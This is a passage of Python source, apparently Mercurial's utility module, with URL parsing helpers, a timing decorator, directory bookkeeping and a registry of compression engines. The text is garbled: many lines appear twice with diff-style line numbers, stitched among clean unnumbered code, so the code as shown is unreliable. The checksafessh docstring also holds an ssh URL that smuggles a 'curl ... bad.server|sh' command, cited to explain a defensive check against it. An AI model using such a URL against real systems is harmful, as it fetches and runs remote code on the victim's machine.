        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))
2802
2802
2803 def isabs(self):
2803 def isabs(self):
2804 if self.scheme and self.scheme != 'file':
2804 if self.scheme and self.scheme != 'file':
2805 return True # remote URL
2805 return True # remote URL
2806 if hasdriveletter(self.path):
2806 if hasdriveletter(self.path):
2807 return True # absolute for our purposes - can't be joined()
2807 return True # absolute for our purposes - can't be joined()
2808 if self.path.startswith(br'\\'):
2808 if self.path.startswith(br'\\'):
2809 return True # Windows UNC path
2809 return True # Windows UNC path
2810 if self.path.startswith('/'):
2810 if self.path.startswith('/'):
2811 return True # POSIX-style
2811 return True # POSIX-style
2812 return False
2812 return False
2813
2813
    def localpath(self):
        # Return a filesystem path for file:/bundle: URLs; for any other
        # scheme, hand back the original URL string unchanged.
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                # a bare host with a relative path means the path was
                # rooted at the host; re-anchor it
                path = '/' + path
            return path
        return self._origpath
2826
2826
2827 def islocal(self):
2827 def islocal(self):
2828 '''whether localpath will return something that posixfile can open'''
2828 '''whether localpath will return something that posixfile can open'''
2829 return (not self.scheme or self.scheme == 'file'
2829 return (not self.scheme or self.scheme == 'file'
2830 or self.scheme == 'bundle')
2830 or self.scheme == 'bundle')
2831
2831
def hasscheme(path):
    """Report whether *path* carries a URL scheme (e.g. ``http``, ``ssh``)."""
    parsed = url(path)
    return bool(parsed.scheme)
2834
2834
def hasdriveletter(path):
    """Report whether *path* starts with a Windows drive letter ('c:...').

    Falsy inputs are passed straight through, matching the original
    short-circuit behavior.
    """
    if not path:
        return path
    return path[1:2] == ':' and path[0:1].isalpha()
2837
2837
def urllocalpath(path):
    """Return the local filesystem path for *path*.

    Query string and fragment are treated as part of the path rather
    than parsed out.
    """
    u = url(path, parsequery=False, parsefragment=False)
    return u.localpath()
2840
2840
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    # unquote first so percent-encoded dashes can't sneak past the check
    unquoted = urlreq.unquote(path)
    if unquoted.startswith(('ssh://-', 'svn+ssh://-')):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(path),))
2855
2855
def hidepassword(u):
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        # keep the URL shape but mask the secret
        parsed.passwd = '***'
    return bytes(parsed)
2862
2862
def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    # bytes(), not str(): __str__ goes through encoding.strmethod and
    # returns a unicode string on Python 3, whereas callers (and the
    # sibling hidepassword()) work with byte strings.
    return bytes(u)
2868
2868
# Formatter for elapsed-time values, built via unitcountfn(); the triples
# appear to be (threshold, divisor, format) pairs covering seconds down to
# nanoseconds — see unitcountfn() for the exact selection rule.
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )
2884
2884
# Current indentation level for nested @timed reports (in spaces).
_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        start = timer()
        indent = 2
        _timenesting[0] += indent
        try:
            return func(*args, **kwargs)
        finally:
            # report even when func raises, and unwind the nesting level
            elapsed = timer() - start
            _timenesting[0] -= indent
            # write via procutil.stderr (as debugstacktrace does) instead
            # of the deprecated module-level stderr proxy
            procutil.stderr.write('%s%s: %s\n' %
                                  (' ' * _timenesting[0], func.__name__,
                                   timecount(elapsed)))
    return wrapper
2911
2911
# Recognized size suffixes and their byte multipliers. Single-letter forms
# are listed before the two-letter ones; lookup is first-match-wins.
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    spec = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if spec.endswith(suffix):
                magnitude = float(spec[:-len(suffix)])
                return int(magnitude * multiplier)
        # no recognized suffix: treat as a plain integer byte count
        return int(spec)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
2933
2933
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        # list of (source, callable); kept sorted lazily at call time
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        # sort in place so repeated calls stay ordered by source name
        self._hooks.sort(key=lambda pair: pair[0])
        return [fn(*args) for _source, fn in self._hooks]
2951
2951
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
        length of longest filepath+line number,
        filepath+linenumber,
        function

    Not be used in production code but very convenient while developing.
    '''
    # extract_stack() is oldest-frame-first: [:-skip - 1] drops this
    # function's own frame plus 'skip' callers from the end; [-depth:]
    # then keeps the innermost 'depth' entries (depth=0 keeps all,
    # since [-0:] is the whole list).
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        # pad the file:line column to the widest entry
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)
2974
2974
def debugstacktrace(msg='stacktrace', skip=0,
                    f=procutil.stderr, otherf=procutil.stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    '''
    if otherf:
        # flush the other stream first so the trace is not interleaved
        # with buffered output
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    # skip + 1 also hides debugstacktrace's own frame
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()
2989
2989
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        # directory name -> reference count (see addpath/delpath)
        self._dirs = {}
        addpath = self.addpath  # bind once; called in a tight loop
        if safehasattr(map, 'iteritems') and skip is not None:
            # dirstate-style map: values are state tuples; entries whose
            # state byte equals 'skip' are excluded from the multiset
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        # finddirs yields ancestors deepest-first; once we hit a directory
        # that is already present, its own ancestors were counted when it
        # was first inserted, so bump it and stop.
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        # mirror image of addpath: decrement the deepest ancestor that is
        # still shared, deleting the unshared tail below it
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
3025
3025
# Prefer the C implementation of dirs from the parsers extension module
# when it is available.
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3028
3028
def finddirs(path):
    """Yield every ancestor directory of *path*, deepest first.

    'a/b/c' yields 'a/b' then 'a'; a path with no '/' yields nothing.
    """
    prefix = path
    while True:
        sep = prefix.rfind('/')
        if sep == -1:
            break
        prefix = prefix[:sep]
        yield prefix
3034
3034
# compression code

# Roles used by supportedwireengines() to pick the right priority field.
SERVERROLE = 'server'
CLIENTROLE = 'client'

# Describes an engine's wire protocol support:
#   name: identifier used on the wire
#   serverpriority / clientpriority: advertisement ordering hints; per
#   compressionengine.wireprotosupport(), non-positive values are not
#   advertised.
compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))
3043
3043
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        # Engine name to compressionengine instance.
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.

        Aborts if the engine name, bundle name/type, wire type, or revlog
        header collides with an already-registered engine.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        # all validations passed; make the engine visible
        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        # user-facing "bundle spec" compression names
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        # internal bundle compression identifiers
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        # like forbundletype(), but keyed on the wire protocol identifier
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]
3197
3197
# The global compression engine registry.
compengines = compressormanager()
3199
3199
3200 class compressionengine(object):
3200 class compressionengine(object):
3201 """Base class for compression engines.
3201 """Base class for compression engines.
3202
3202
3203 Compression engines must implement the interface defined by this class.
3203 Compression engines must implement the interface defined by this class.
3204 """
3204 """
3205 def name(self):
3205 def name(self):
3206 """Returns the name of the compression engine.
3206 """Returns the name of the compression engine.
3207
3207
3208 This is the key the engine is registered under.
3208 This is the key the engine is registered under.
3209
3209
3210 This method must be implemented.
3210 This method must be implemented.
3211 """
3211 """
3212 raise NotImplementedError()
3212 raise NotImplementedError()
3213
3213
3214 def available(self):
3214 def available(self):
3215 """Whether the compression engine is available.
3215 """Whether the compression engine is available.
3216
3216
3217 The intent of this method is to allow optional compression engines
3217 The intent of this method is to allow optional compression engines
3218 that may not be available in all installations (such as engines relying
3218 that may not be available in all installations (such as engines relying
3219 on C extensions that may not be present).
3219 on C extensions that may not be present).
3220 """
3220 """
3221 return True
3221 return True
3222
3222
    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and `decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        # default: no bundle support
        return None
3240
3240
3241 def wireprotosupport(self):
3241 def wireprotosupport(self):
3242 """Declare support for this compression format on the wire protocol.
3242 """Declare support for this compression format on the wire protocol.
3243
3243
3244 If this compression engine isn't supported for compressing wire
3244 If this compression engine isn't supported for compressing wire
3245 protocol payloads, returns None.
3245 protocol payloads, returns None.
3246
3246
3247 Otherwise, returns ``compenginewireprotosupport`` with the following
3247 Otherwise, returns ``compenginewireprotosupport`` with the following
3248 fields:
3248 fields:
3249
3249
3250 * String format identifier
3250 * String format identifier
3251 * Integer priority for the server
3251 * Integer priority for the server
3252 * Integer priority for the client
3252 * Integer priority for the client
3253
3253
3254 The integer priorities are used to order the advertisement of format
3254 The integer priorities are used to order the advertisement of format
3255 support by server and client. The highest integer is advertised
3255 support by server and client. The highest integer is advertised
3256 first. Integers with non-positive values aren't advertised.
3256 first. Integers with non-positive values aren't advertised.
3257
3257
3258 The priority values are somewhat arbitrary and only used for default
3258 The priority values are somewhat arbitrary and only used for default
3259 ordering. The relative order can be changed via config options.
3259 ordering. The relative order can be changed via config options.
3260
3260
3261 If wire protocol compression is supported, the class must also implement
3261 If wire protocol compression is supported, the class must also implement
3262 ``compressstream`` and ``decompressorreader``.
3262 ``compressstream`` and ``decompressorreader``.
3263 """
3263 """
3264 return None
3264 return None
3265
3265
3266 def revlogheader(self):
3266 def revlogheader(self):
3267 """Header added to revlog chunks that identifies this engine.
3267 """Header added to revlog chunks that identifies this engine.
3268
3268
3269 If this engine can be used to compress revlogs, this method should
3269 If this engine can be used to compress revlogs, this method should
3270 return the bytes used to identify chunks compressed with this engine.
3270 return the bytes used to identify chunks compressed with this engine.
3271 Else, the method should return ``None`` to indicate it does not
3271 Else, the method should return ``None`` to indicate it does not
3272 participate in revlog compression.
3272 participate in revlog compression.
3273 """
3273 """
3274 return None
3274 return None
3275
3275
3276 def compressstream(self, it, opts=None):
3276 def compressstream(self, it, opts=None):
3277 """Compress an iterator of chunks.
3277 """Compress an iterator of chunks.
3278
3278
3279 The method receives an iterator (ideally a generator) of chunks of
3279 The method receives an iterator (ideally a generator) of chunks of
3280 bytes to be compressed. It returns an iterator (ideally a generator)
3280 bytes to be compressed. It returns an iterator (ideally a generator)
3281 of bytes of chunks representing the compressed output.
3281 of bytes of chunks representing the compressed output.
3282
3282
3283 Optionally accepts an argument defining how to perform compression.
3283 Optionally accepts an argument defining how to perform compression.
3284 Each engine treats this argument differently.
3284 Each engine treats this argument differently.
3285 """
3285 """
3286 raise NotImplementedError()
3286 raise NotImplementedError()
3287
3287
3288 def decompressorreader(self, fh):
3288 def decompressorreader(self, fh):
3289 """Perform decompression on a file object.
3289 """Perform decompression on a file object.
3290
3290
3291 Argument is an object with a ``read(size)`` method that returns
3291 Argument is an object with a ``read(size)`` method that returns
3292 compressed data. Return value is an object with a ``read(size)`` that
3292 compressed data. Return value is an object with a ``read(size)`` that
3293 returns uncompressed data.
3293 returns uncompressed data.
3294 """
3294 """
3295 raise NotImplementedError()
3295 raise NotImplementedError()
3296
3296
3297 def revlogcompressor(self, opts=None):
3297 def revlogcompressor(self, opts=None):
3298 """Obtain an object that can be used to compress revlog entries.
3298 """Obtain an object that can be used to compress revlog entries.
3299
3299
3300 The object has a ``compress(data)`` method that compresses binary
3300 The object has a ``compress(data)`` method that compresses binary
3301 data. This method returns compressed binary data or ``None`` if
3301 data. This method returns compressed binary data or ``None`` if
3302 the data could not be compressed (too small, not compressible, etc).
3302 the data could not be compressed (too small, not compressible, etc).
3303 The returned data should have a header uniquely identifying this
3303 The returned data should have a header uniquely identifying this
3304 compression format so decompression can be routed to this engine.
3304 compression format so decompression can be routed to this engine.
3305 This header should be identified by the ``revlogheader()`` return
3305 This header should be identified by the ``revlogheader()`` return
3306 value.
3306 value.
3307
3307
3308 The object has a ``decompress(data)`` method that decompresses
3308 The object has a ``decompress(data)`` method that decompresses
3309 data. The method will only be called if ``data`` begins with
3309 data. The method will only be called if ``data`` begins with
3310 ``revlogheader()``. The method should return the raw, uncompressed
3310 ``revlogheader()``. The method should return the raw, uncompressed
3311 data or raise a ``RevlogError``.
3311 data or raise a ``RevlogError``.
3312
3312
3313 The object is reusable but is not thread safe.
3313 The object is reusable but is not thread safe.
3314 """
3314 """
3315 raise NotImplementedError()
3315 raise NotImplementedError()
3316
3316
# zlib ("gzip") engine, backed by the zlib module; registered unconditionally.
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        # -1 selects zlib's default level unless the caller overrides it.
        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            # Inputs under 44 bytes are never attempted.
            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                # Only return output that is actually smaller than the input;
                # otherwise signal "not worth storing compressed" with None.
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    # Feed the input in 1 MiB (2**20) slices.
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
3403
3403
# bzip2 engine, backed by the bz2 module; registered unconditionally.
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # Default to level 9 unless the caller specifies otherwise.
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            # compress() may buffer input without emitting output yet.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())
3446
3446
# Decompression-only variant of bz2 for streams stored without the
# leading 'BZ' magic.
class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        # First element None keeps this format out of user-facing bundle
        # specs; only the internal identifier is usable.
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())
3467
3467
# Pass-through engine: no compression or decompression is applied.
class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        # Identity: chunks pass through untouched.
        return it

    def decompressorreader(self, fh):
        # Identity: the file object already yields the raw data.
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            # None signals that the data was not compressed, so revlog
            # entries are stored raw.
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())
3502
3502
# zstd engine, backed by the optional bundled python-zstandard module;
# available() is False when the module cannot be imported.
class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            # compress() may buffer input without emitting output yet.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            # Inputs under 50 bytes are never attempted.
            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                # Only keep compressed output that is actually smaller.
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                # Large inputs: compress in recommended-size slices to
                # bound working memory.
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())
3631
3631
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    entries = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        # Skip engines that don't do bundles or hide their public name.
        if not (bt and bt[0]):
            continue

        formatted = pycompat.sysstr('``%s``\n %s') % (
            bt[0], engine.bundletype.__doc__)

        holder = docobject()
        holder.__doc__ = formatted
        holder._origdoc = engine.bundletype.__doc__
        holder._origfunc = engine.bundletype

        entries[bt[0]] = holder

    return entries
3663
3663
# Keep the formatted docstring holders reachable at module level; the name
# suggests they are collected for i18n/translation tooling
# (NOTE(review): confirm against the i18n extraction scripts).
i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace
3668
3668
def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    taken = others if others is not None else set()

    def _isfree(name):
        # A candidate is usable only when neither the context nor the
        # extra set already contains it.
        return name not in ctx and name not in taken

    candidate = '%s~%s' % (f, tag)
    if _isfree(candidate):
        return candidate
    for suffix in itertools.count(1):
        candidate = '%s~%s~%s' % (f, tag, suffix)
        if _isfree(candidate):
            return candidate
3691
3691
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    data = stream.read(n)
    if len(data) >= n:
        return data
    # A short read means the stream was truncated; surface it as an abort.
    raise error.Abort(_("stream ended unexpectedly"
                        " (got %d bytes, expected %d)")
                      % (len(data), n))
3700
3700
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    # Emit 7 bits per byte, least significant group first; every byte but
    # the final one carries the 0x80 continuation flag.
    low = value & 0x7f
    value >>= 7
    chunks = []
    while value:
        chunks.append(pycompat.bytechr(0x80 | low))
        low = value & 0x7f
        value >>= 7
    chunks.append(pycompat.bytechr(low))

    return ''.join(chunks)
3737
3737
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    value = 0
    shift = 0
    while True:
        # Each byte carries 7 payload bits; 0x80 flags a continuation.
